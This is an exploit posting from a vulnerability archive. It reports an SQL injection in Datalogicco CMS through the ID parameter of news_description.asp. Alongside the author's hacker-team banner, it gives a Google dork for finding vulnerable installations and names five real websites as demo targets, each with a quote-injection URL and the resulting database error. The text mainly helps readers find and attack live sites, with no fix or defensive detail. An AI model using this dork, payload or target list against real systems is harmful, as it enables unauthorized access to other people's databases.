Datalogicco CMS SQL Injection

2013-09-05T00:00:00
ID PACKETSTORM:123108
Type packetstorm
Reporter Hossein Hezami
Modified 2013-09-05T00:00:00

Description

                                        
                                            `########################################################################  
# 1010101010101010101010101010101010101010101010101 #  
# 0 __ _ __ 0 #  
# 1 /'__`\ /' \/\ \ 1 #  
# 0 /\_\ \ \ __ __ /\_, \ \ \ 0 #  
# 1 \/_/_\_<_ /\ \ /\ \\/_/\ \ \ \ 1 #  
# 0 /\ \ \ \\ \ \_/ / \ \ \ \ \____ 0 #  
# 1 \ \____/ \ \___/ \ \_\ \_____\ 1 #  
# 0 \/___/ \/__/ \/_/\/_____/ 0 #  
# 1 1 #  
# 0 >> Dr.3v1l 0 #  
# 1 >> 0WebSecurity.IR 1 #  
# 0 0 #  
# 1 [+] E-Mail : B.Devils.B@gmail.com 1 #  
# 0 [+] Y! : Doctor.3v1l 0 #  
# 1 1 #  
# 0 ########################################### 0 #  
# 1 I'm 3v1l member from Black_Devils B0ys Team 1 #  
# 0 ########################################### 0 #  
# 1 1 #  
# 0101010101010101010101010101010101010101010101010 #  
########################################################################  
#  
# Exploit Title: Datalogicco CMS SQL Injection  
# Date: 2013 5 September  
# Author: Hossein Hezami ( Dr.3v1l )  
# Software Link: www.datalogicco.com  
# Version: All Version  
# Category: webapps  
# Google Keywords: inurl:"/news_description.asp?ID="  
# Tested on: Windows , Linux  
#  
########################################################################  
#  
# [~] Exploit :  
#  
# http://<server>/news_description.asp?ID=[SQL Injection]  
#  
########################################################################  
#  
# [~] Demo :  
#  
# www.davidestates.com/news_description.asp?ID=1'  
# www.medbluerealty.com/news_description.asp?ID=1'  
# www.varicom.com.cy/news_description.asp?ID=1'  
# www.takiana.com/news_description.asp?ID=1'  
# www.nccfb.com/news_description.asp?id=1'  
#  
# Error :  
# [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'News_id=1''.  
#  
########################################################################  
#  
# [~] Note :  
#  
# This Is A Simple SQL Injection  
# Found by Dr.3v1l  
#  
########################################################################  
#  
# [~] Contact Me :  
#  
# Teacher.3v1l@live.com  
# B.Devils.B@gmail.com  
# Twitter.com/Doctor_3v1l  
# IR.LinkedIN.com/in/Hossein3v1l  
#  
########################################################################  
`